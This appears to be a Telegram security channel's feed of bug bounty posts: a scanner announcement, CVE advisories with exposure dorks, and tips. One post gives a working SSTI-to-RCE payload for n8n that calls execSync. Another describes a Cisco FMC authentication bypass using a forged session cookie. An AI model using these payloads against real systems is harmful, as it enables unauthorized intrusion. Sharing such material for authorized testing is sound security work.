Brut Security
15.6K subscribers
1.02K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
🚨 *APIStrike is live!* β€” API Security Scanner by RevoltSecurities

Automate your API pentesting. Point it at an OpenAPI spec, it handles the rest.

*What hits:*
⚑ OWASP API Top 10 coverage
🎯 DAST fuzzing β€” SQLi, XSS, SSRF, SSTI, CMDi & more
πŸ” Auth-aware β€” JWT, Basic, API key, Cookie bypass
πŸ”„ CI/CD gate β€” blocks deploys on critical findings
https://github.com/RevoltSecurities/apistrike
⭐ Star it. Share it. Break APIs legally.
❀5πŸ”₯4
πŸ‘‰πŸ‘‰πŸ‘‰πŸ‘‰Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
2πŸ”₯10❀5
🚨One Liners for bug bounty

βœ… Download: https://github.com/0xPugal/One-Liners
πŸ”₯5❀1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)

The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}


If you guys are really enjoy to read, then show your love ❀️

#rce #ssti #n8n
❀17πŸ‘5
Happy Bengali New Year 1433 🌸

New year. New game.
No excuses this time , only execution.
Build yourself so strong that opportunities start chasing you.

β€” Brut Security πŸ”₯
❀5πŸ™1🀝1
CVE-2026-32201: Microsoft SharePoint Server Spoofing Vulnerability, 6.5 rating ❗️

Improper input validation in Microsoft SharePoint Server allows an unauthorized attacker to perform spoofing over a network and view sensitive internal data or make unauthorized changes. This vulnerability is already being actively exploited in the wild!

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/DjQpd
πŸ‘‰ Dork: http.headers.microsoftsharepointteamservices:*
πŸ‘‰ Dork (MS subdomains filtered): http.headers.microsoftsharepointteamservices:* !host:*.sharepoint.com

Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201
❀3
Hey Hunter’s,
DarkShadow is here back again!

Authentication Bypass via Forged Session Cookie
(Cisco Secure Firewall Management Center)

Analysis:
-checks only for the presence of the CGISESSID cookie.
-but does not validate whether the session ID is legitimate, active, or tied to an authenticated user.

Impact:
an attacker can supply an arbitrary or default value like csm_processes to bypass the redirect to /ui/login and gain unauthorized access to the protected resource.

So Guy’s if you really enjoy to ready such as methods then show your love🀍

#bugbountytips #auth_bypass
❀7πŸ‘3
🚨 Fortinet just disclosed CVE-2026-39808 and CVE-2026-39813 - 2 critical vulnerabilities affecting FortiSandbox. No active exploitation itw reported as of yet.

Scan your infrastructure to find vulnerable instances:
CVE-2026-39808: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39808.yaml
CVE-2026-39813: https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39813.yaml

CVE-2026-39808 (CVSS 9.1):
An Improper Neutralization of Special Elements used in an OS Command ('OS command injection') vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests.

CVE-2026-39813 (CVSS 9.1):
A Path Traversal vulnerability [CWE-24] in FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests.

Patches are available as per vendor advisories:
https://fortiguard.fortinet.com/psirt/FG-IR-26-112
https://fortiguard.fortinet.com/psirt/FG-IR-26-100
❀3🀝1
If I had a dollar for every β€œhack my ex” request...
😒5❀2πŸ”₯2
Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4
Please open Telegram to view this post
VIEW IN TELEGRAM
Nahamsec Reconnaissance Guide
❀9πŸ”₯4πŸ‘3πŸ‘2😁2
Launching Soon :)
❀16πŸ”₯9
⚠️Just dropped something I've been building for a while

🌐A complete Web Application Bug Bounty Methodology β€” 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reporting and more.

🟒Giving away 5 free coupons to the first 5 people who drop a comment. No catch.

▢️ https://topmate.io/saumadip/2054509
πŸ”₯ Coupon Code= awxe

β€” Brut Security
Please open Telegram to view this post
VIEW IN TELEGRAM
5❀4πŸ”₯3πŸ‘1πŸ‘1
Brut Security pinned «⚠️Just dropped something I've been building for a while 🌐A complete Web Application Bug Bounty Methodology β€” 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reporting…»